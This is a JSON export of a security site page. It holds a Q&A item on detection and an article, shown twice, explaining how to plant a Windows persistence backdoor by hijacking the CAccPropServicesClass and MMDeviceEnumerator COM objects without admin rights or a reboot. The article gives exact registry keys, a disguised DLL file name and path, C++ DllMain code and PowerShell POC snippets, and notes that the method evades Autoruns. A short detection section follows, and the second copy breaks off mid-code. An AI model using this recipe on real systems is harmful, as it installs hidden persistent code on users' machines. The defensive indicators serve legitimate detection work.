[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTkpmKkVOzviOY-id0PGkCAKWY7Sc-KPD0Cg8kWJZNQc":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},695,"How can defenders detect this COM hijacking persistence technique?","Defenders should monitor registry keys under HKCU\\Software\\Classes\\CLSID\\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} and the Wow6432Node variant. Additionally, watch for suspicious DLL files named api-ms-win-downlevel-*._dl in %APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\. These indicators can reveal unauthorized modifications that bypass standard Autoruns checks, as discussed in the original article's defense section.","\u003Cp>Defenders should monitor registry keys under HKCU\\Software\\Classes\\CLSID\\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} and the Wow6432Node variant. Additionally, watch for suspicious DLL files named api-ms-win-downlevel-*._dl in %APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\. These indicators can reveal unauthorized modifications that bypass standard Autoruns checks, as discussed in the original article&#39;s defense section.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-com-object-hijacking-to-maintain-persistence-hijack-caccpropservicesclass-and-mmdeviceenumerator\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-defenders-detect-this-com-hijacking-persistence-technique-1777482447233","detection, registry monitoring, Autoruns, file paths, COM hijacking defense",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},172,"Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator","use-com-object-hijacking-to-maintain-persistence-hijack-caccpropservicesclass-and-mmdeviceenumerator","Learn how to use COM object hijacking for persistence by targeting CAccPropServicesClass and MMDeviceEnumerator. No admin rights or reboot needed. Includes POC and defense tips.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article \"Use CLR to maintain persistence\", a method to hijack all .Net programs via CLR was introduced, which does not require administrator privileges and can be used as a backdoor. The drawback is that adding environment variables via WMI requires a system restart.\u003C\u002Fp>\u003Cp>This article will continue to introduce another method for backdoor exploitation. The principle is similar, but the advantage is that it does not require a system restart and also does not require administrator privileges.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The method introduced in this article was once used by the Trojan COMpfun\u003C\u002Fp>\u003Cp>\u003Cstrong>Detailed introduction address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.gdatasoftware.com\u002Fblog\u002F2014\u002F10\u002F23941-com-object-hijacking-the-discreet-way-of-persistence\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Backdoor concept\u003C\u002Fli>\u003Cli>POC development\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 COM Components\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>COM stands for Component Object Model\u003C\u002Fli>\u003Cli>COM components consist of executable code released in the form of DLLs and EXEs\u003C\u002Fli>\u003Cli>COM is language and platform independent\u003C\u002Fli>\u003Cli>COM components correspond to registry key values under CLSID in the registry\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Backdoor Concept\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The concept is derived from https:\u002F\u002Fwww.gdatasoftware.com\u002Fblog\u002F2014\u002F10\u002F23941-com-object-hijacking-the-discreet-way-of-persistence\u003C\u002Fp>\u003Cp>Similar to the method of hijacking .Net programs using CLR, this also involves modifying registry key values under CLSID to hijack CAccPropServicesClass and MMDeviceEnumerator. Since many normal system programs need to call these two instances upon startup, this can be used as a backdoor. Additionally, this method can bypass Autoruns detection of startup items.\u003C\u002Fp>\u003Ch3>Exploitation method for 32-bit systems:\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. Create a new file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Place the test DLL in %APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\ and rename it to api-ms-win-downlevel-[4char-random]-l1-1-0._dl\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test DLL download address: an open-source project\u003C\u002Fp>\u003Cp>Rename to api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017282637_0_f411ef517b.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Modify the registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Registry location: HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fp>\u003Cp>Create key {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\u003C\u002Fp>\u003Cp>Create subkey InprocServer32\u003C\u002Fp>\u003Cp>Default key value is the absolute path of the test DLL:\u003C\u002Fp>\u003Cp>C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>Create key value: ThreadingModel REG_SZ Apartment\u003C\u002Fp>\u003Cp>Registry content as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017310848_1_88c1366bcb.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Test\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Start iexplore.exe, trigger the backdoor, launch calc.exe multiple times, eventually causing system crash\u003C\u002Fp>\u003Cp>Multiple calls to instance CAccPropServicesClass() during startup process result in launching multiple calc.exe instances, eventually causing system crash\u003C\u002Fp>\u003Cp>\u003Cstrong>4. Optimization\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add a mutex to the DLL to prevent repeated loading and ensure calc.exe is launched only once\u003C\u002Fp>\u003Cp>C++ code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#pragma comment(linker,\"\u002FOPT:nowin98\")\u003Cbr>BOOL TestMutex()\u003Cbr>{\u003Cbr>\u003Cbr>\tHANDLE hMutex = CreateMutex(NULL, false, \"myself\");\u003Cbr>\tif (GetLastError() == ERROR_ALREADY_EXISTS)\u003Cbr>\t{\u003Cbr>\t\tCloseHandle(hMutex);\u003Cbr>\t\treturn 0;\u003Cbr>\t}\u003Cbr>\treturn 1;\u003Cbr>}\u003Cbr>BOOL APIENTRY DllMain( HANDLE hModule, \u003Cbr>                       DWORD  ul_reason_for_call, \u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>    switch (ul_reason_for_call)\u003Cbr>\t{\u003Cbr>\t\tcase DLL_PROCESS_ATTACH:\u003Cbr>\t\t\tif(TestMutex()==0)\u003Cbr>\t\t\t\treturn TRUE;\u003Cbr>\t\t\tWinExec(\"calc.exe\",SW_SHOWNORMAL);\u003Cbr>\t\tcase DLL_THREAD_ATTACH:\u003Cbr>\t\tcase DLL_THREAD_DETACH:\u003Cbr>\t\tcase DLL_PROCESS_DETACH:\u003Cbr>\t\t\tbreak;\u003Cbr>    }return TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Optimization method reference: https:\u002F\u002Fsome-open-source-project\u002FUse-Office-to-maintain-persistence\u003C\u002Fp>\u003Cp>Compiled size 3k. If the DLL is loaded multiple times, it will only load once due to mutex, meaning calc.exe will only launch once.\u003C\u002Fp>\u003Cp>Download link for compiled DLL:\u003C\u002Fp>\u003Cp>some-open-source-project\u003C\u002Fp>\u003Cp>Switch to the new DLL and test again. calc.exe only launches once, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017347912_2_f4665f4080.jpeg\">\u003C\u002Fp>\u003Ch3>64-bit system exploitation method:\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. Create new file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Place 32-bit and 64-bit test DLLs in %APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\ respectively\u003C\u002Fp>\u003Cp>32-bit DLL download link:\u003C\u002Fp>\u003Cp>some-open-source-project\u003C\u002Fp>\u003Cp>Rename to api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>64-bit DLL download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Renamed to api-ms-win-downlevel-1x64-l1-1-0._dl\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Modify the registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(1)\u003C\u002Fp>\u003Cp>Registry location: HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fp>\u003Cp>Create key {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\u003C\u002Fp>\u003Cp>Create subkey InprocServer32\u003C\u002Fp>\u003Cp>Default key value is the absolute path of the 64-bit dll:\u003C\u002Fp>\u003Cp>C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x64-l1-1-0._dl\u003C\u002Fp>\u003Cp>Create key value: ThreadingModel REG_SZ Apartment\u003C\u002Fp>\u003Cp>Registry content as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017385811_3_d49a8032b0.jpeg\">\u003C\u002Fp>\u003Cp>(2)\u003C\u002Fp>\u003Cp>Registry location: HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\\u003C\u002Fp>\u003Cp>Create key {BCDE0395-E52F-467C-8E3D-C4579291692E}\u003C\u002Fp>\u003Cp>Create subkey InprocServer32\u003C\u002Fp>\u003Cp>Default key value is 32-bit dll path:\u003C\u002Fp>\u003Cp>C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>Create key value: ThreadingModel REG_SZ Apartment\u003C\u002Fp>\u003Cp>Registry content as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017411273_4_8eda1dfdf0.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>3、Testing\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Launch both 32-bit and 64-bit iexplore.exe, both can trigger the backdoor, starting calc.exe once\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} corresponds to CAccPropServicesClass\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faccessibility.caccpropservicesclass(v=vs.110).aspx?cs-save-lang=1&amp;cs-lang=cpp#code-snippet-1\u003C\u002Fp>\u003Cp>{BCDE0395-E52F-467C-8E3D-C4579291692E} corresponds to MMDeviceEnumerator\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fdd316556%28v=vs.85%29.aspx\u003C\u002Fp>\u003Ch2>0x04 POC Writing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Details to note in POC development:\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Operations do not necessarily include folders by default\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>First, check if the folder %APPDATA%\\Microsoft\\Installer\\ exists\u003C\u002Fp>\u003Cp>If not, create the folder Installer under %APPDATA%\\Microsoft\\\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if((Test-Path %APPDATA%\\Microsoft\\Installer\\) -eq 0)\u003Cbr>{\u003Cbr>\tWrite-Host \"[+] Create Folder:  $env:APPDATA\\Microsoft\\Installer\\\"\u003Cbr>\tnew-item -path $env:APPDATA\\Microsoft\\ -name Installer -type directory\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>2. Create the folder {BCDE0395-E52F-467C-8E3D-C4579291692E}\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since it contains special characters {}, the path must be enclosed in double quotes\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if((Test-Path \"%APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\") -eq 0)\u003Cbr>{\u003Cbr>\tWrite-Host \"[+] Create Folder:  $env:APPDATA\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\"\u003Cbr>\tnew-item -path $env:APPDATA\\Microsoft\\Installer -name {BCDE0395-E52F-467C-8E3D-C4579291692E} -type directory\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>3. Create payload file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>First, determine the operating system\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if ([Environment]::Is64BitOperatingSystem)\u003Cbr>{\u003Cbr>        Write-Host \"[+] OS: x64\"       \u003Cbr>}\u003Cbr>else\u003Cbr>{\u003Cbr>        Write-Host \"[+] OS: x86\"\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Release different files for different systems\u003C\u002Fp>\u003Cp>Files are still released using base64, refer to article: https:\u002F\u002Fsome-open-source-project\u002FUse-Office-to-maintain-persistence\u003C\u002Fp>\u003Cp>\u003Cstrong>4. Create registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modify the default registry value, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017458473_5_5e3e11c43a.jpeg\">\u003C\u002Fp>\u003Cp>In PowerShell, the special variable \"(default)\" needs to be used\u003C\u002Fp>\u003Cp>eg:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RegPath=\"HKCU:Software\\Classes\\CLSID\\\"\u003Cbr>New-ItemProperty $RegPath\"{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\\InprocServer32\" \"(default)\" -value $env:APPDATA\"\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x86-l1-1-0._dl\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Complete POC has been uploaded to GitHub, address: some-open-source-project\u003C\u002Fp>\u003Ch2>0x05 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on exploitation methods, monitor the following locations:\u003C\u002Fp>\u003Ch3>1. Registry key values\u003C\u002Fh3>\u003Cul>\u003Cli>HKCU\\Software\\Classes\\CLSID\\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\\\u003C\u002Fli>\u003Cli>HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E }\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. File Path\u003C\u002Fh3>\u003Cp>%APPDATA%\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\\u003C\u002Fp>\u003Cp>Naming convention: api-ms-win-downlevel-[4char-random]-l1-1-0._dl\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces a backdoor exploitation method achieved through COM Object hijacking, uses PowerShell scripts to write a POC, shares details to note during POC development, and analyzes defense methods against this backdoor based on practical exploitation processes.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article \"Use CLR to maintain persistence\", a method to hijack all .Net programs via CLR was introduced, which does not require administrator privileges and can be used as a backdoor. The drawback is that adding environment variables via WMI requires a system restart.\u003C\u002Fp>\u003Cp>This article will continue to introduce another method for backdoor exploitation. The principle is similar, but the advantage is that it does not require a system restart and also does not require administrator privileges.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The method introduced in this article was once used by the Trojan COMpfun\u003C\u002Fp>\u003Cp>\u003Cstrong>Detailed introduction address:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.gdatasoftware.com\u002Fblog\u002F2014\u002F10\u002F23941-com-object-hijacking-the-discreet-way-of-persistence\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Backdoor concept\u003C\u002Fli>\u003Cli>POC development\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 COM Components\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>COM stands for Component Object Model\u003C\u002Fli>\u003Cli>COM components consist of executable code released in the form of DLLs and EXEs\u003C\u002Fli>\u003Cli>COM is language and platform independent\u003C\u002Fli>\u003Cli>COM components correspond to registry key values under CLSID in the registry\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x03 Backdoor Concept\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The concept is derived from https:\u002F\u002Fwww.gdatasoftware.com\u002Fblog\u002F2014\u002F10\u002F23941-com-object-hijacking-the-discreet-way-of-persistence\u003C\u002Fp>\u003Cp>Similar to the method of hijacking .Net programs using CLR, this also involves modifying registry key values under CLSID to hijack CAccPropServicesClass and MMDeviceEnumerator. Since many normal system programs need to call these two instances upon startup, this can be used as a backdoor. Additionally, this method can bypass Autoruns detection of startup items.\u003C\u002Fp>\u003Ch3>Exploitation method for 32-bit systems:\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. Create a new file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Place the test DLL in %APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\ and rename it to api-ms-win-downlevel-[4char-random]-l1-1-0._dl\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Test DLL download address: an open-source project\u003C\u002Fp>\u003Cp>Rename to api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017282637_0_f411ef517b-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Modify the registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Registry location: HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fp>\u003Cp>Create key {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\u003C\u002Fp>\u003Cp>Create subkey InprocServer32\u003C\u002Fp>\u003Cp>Default key value is the absolute path of the test DLL:\u003C\u002Fp>\u003Cp>C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>Create key value: ThreadingModel REG_SZ Apartment\u003C\u002Fp>\u003Cp>Registry content as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017310848_1_88c1366bcb-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Test\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Start iexplore.exe, trigger the backdoor, launch calc.exe multiple times, eventually causing system crash\u003C\u002Fp>\u003Cp>Multiple calls to instance CAccPropServicesClass() during startup process result in launching multiple calc.exe instances, eventually causing system crash\u003C\u002Fp>\u003Cp>\u003Cstrong>4. Optimization\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add a mutex to the DLL to prevent repeated loading and ensure calc.exe is launched only once\u003C\u002Fp>\u003Cp>C++ code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#pragma comment(linker,\"\u002FOPT:nowin98\")\u003Cbr>BOOL TestMutex()\u003Cbr>{\u003Cbr>\u003Cbr>\tHANDLE hMutex = CreateMutex(NULL, false, \"myself\");\u003Cbr>\tif (GetLastError() == ERROR_ALREADY_EXISTS)\u003Cbr>\t{\u003Cbr>\t\tCloseHandle(hMutex);\u003Cbr>\t\treturn 0;\u003Cbr>\t}\u003Cbr>\treturn 1;\u003Cbr>}\u003Cbr>BOOL APIENTRY DllMain( HANDLE hModule, \u003Cbr>                       DWORD  ul_reason_for_call, \u003Cbr>                       LPVOID lpReserved\u003Cbr>\t\t\t\t\t )\u003Cbr>{\u003Cbr>    switch (ul_reason_for_call)\u003Cbr>\t{\u003Cbr>\t\tcase DLL_PROCESS_ATTACH:\u003Cbr>\t\t\tif(TestMutex()==0)\u003Cbr>\t\t\t\treturn TRUE;\u003Cbr>\t\t\tWinExec(\"calc.exe\",SW_SHOWNORMAL);\u003Cbr>\t\tcase DLL_THREAD_ATTACH:\u003Cbr>\t\tcase DLL_THREAD_DETACH:\u003Cbr>\t\tcase DLL_PROCESS_DETACH:\u003Cbr>\t\t\tbreak;\u003Cbr>    }return TRUE;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Optimization method reference: https:\u002F\u002Fsome-open-source-project\u002FUse-Office-to-maintain-persistence\u003C\u002Fp>\u003Cp>Compiled size 3k. If the DLL is loaded multiple times, it will only load once due to mutex, meaning calc.exe will only launch once.\u003C\u002Fp>\u003Cp>Download link for compiled DLL:\u003C\u002Fp>\u003Cp>some-open-source-project\u003C\u002Fp>\u003Cp>Switch to the new DLL and test again. calc.exe only launches once, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017347912_2_f4665f4080-1.jpeg\">\u003C\u002Fp>\u003Ch3>64-bit system exploitation method:\u003C\u002Fh3>\u003Cp>\u003Cstrong>1. Create new file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Place 32-bit and 64-bit test DLLs in %APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\ respectively\u003C\u002Fp>\u003Cp>32-bit DLL download link:\u003C\u002Fp>\u003Cp>some-open-source-project\u003C\u002Fp>\u003Cp>Rename to api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>64-bit DLL download link:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Renamed to api-ms-win-downlevel-1x64-l1-1-0._dl\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Modify the registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>(1)\u003C\u002Fp>\u003Cp>Registry location: HKCU\\Software\\Classes\\CLSID\\\u003C\u002Fp>\u003Cp>Create key {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\u003C\u002Fp>\u003Cp>Create subkey InprocServer32\u003C\u002Fp>\u003Cp>Default key value is the absolute path of the 64-bit dll:\u003C\u002Fp>\u003Cp>C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x64-l1-1-0._dl\u003C\u002Fp>\u003Cp>Create key value: ThreadingModel REG_SZ Apartment\u003C\u002Fp>\u003Cp>Registry content as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017385811_3_d49a8032b0-1.jpeg\">\u003C\u002Fp>\u003Cp>(2)\u003C\u002Fp>\u003Cp>Registry location: HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\\u003C\u002Fp>\u003Cp>Create key {BCDE0395-E52F-467C-8E3D-C4579291692E}\u003C\u002Fp>\u003Cp>Create subkey InprocServer32\u003C\u002Fp>\u003Cp>Default key value is 32-bit dll path:\u003C\u002Fp>\u003Cp>C:\\Users\\a\\AppData\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x86-l1-1-0._dl\u003C\u002Fp>\u003Cp>Create key value: ThreadingModel REG_SZ Apartment\u003C\u002Fp>\u003Cp>Registry content as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017411273_4_8eda1dfdf0-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>3、Testing\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Launch both 32-bit and 64-bit iexplore.exe, both can trigger the backdoor, starting calc.exe once\u003C\u002Fp>\u003Cp>Test successful\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} corresponds to CAccPropServicesClass\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faccessibility.caccpropservicesclass(v=vs.110).aspx?cs-save-lang=1&amp;cs-lang=cpp#code-snippet-1\u003C\u002Fp>\u003Cp>{BCDE0395-E52F-467C-8E3D-C4579291692E} corresponds to MMDeviceEnumerator\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fwindows\u002Fdesktop\u002Fdd316556%28v=vs.85%29.aspx\u003C\u002Fp>\u003Ch2>0x04 POC Writing\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Details to note in POC development:\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Operations do not necessarily include folders by default\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>First, check if the folder %APPDATA%\\Microsoft\\Installer\\ exists\u003C\u002Fp>\u003Cp>If not, create the folder Installer under %APPDATA%\\Microsoft\\\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if((Test-Path %APPDATA%\\Microsoft\\Installer\\) -eq 0)\u003Cbr>{\u003Cbr>\tWrite-Host \"[+] Create Folder:  $env:APPDATA\\Microsoft\\Installer\\\"\u003Cbr>\tnew-item -path $env:APPDATA\\Microsoft\\ -name Installer -type directory\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>2. Create the folder {BCDE0395-E52F-467C-8E3D-C4579291692E}\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since it contains special characters {}, the path must be enclosed in double quotes\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if((Test-Path \"%APPDATA%\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\") -eq 0)\u003Cbr>{\u003Cbr>\tWrite-Host \"[+] Create Folder:  $env:APPDATA\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\"\u003Cbr>\tnew-item -path 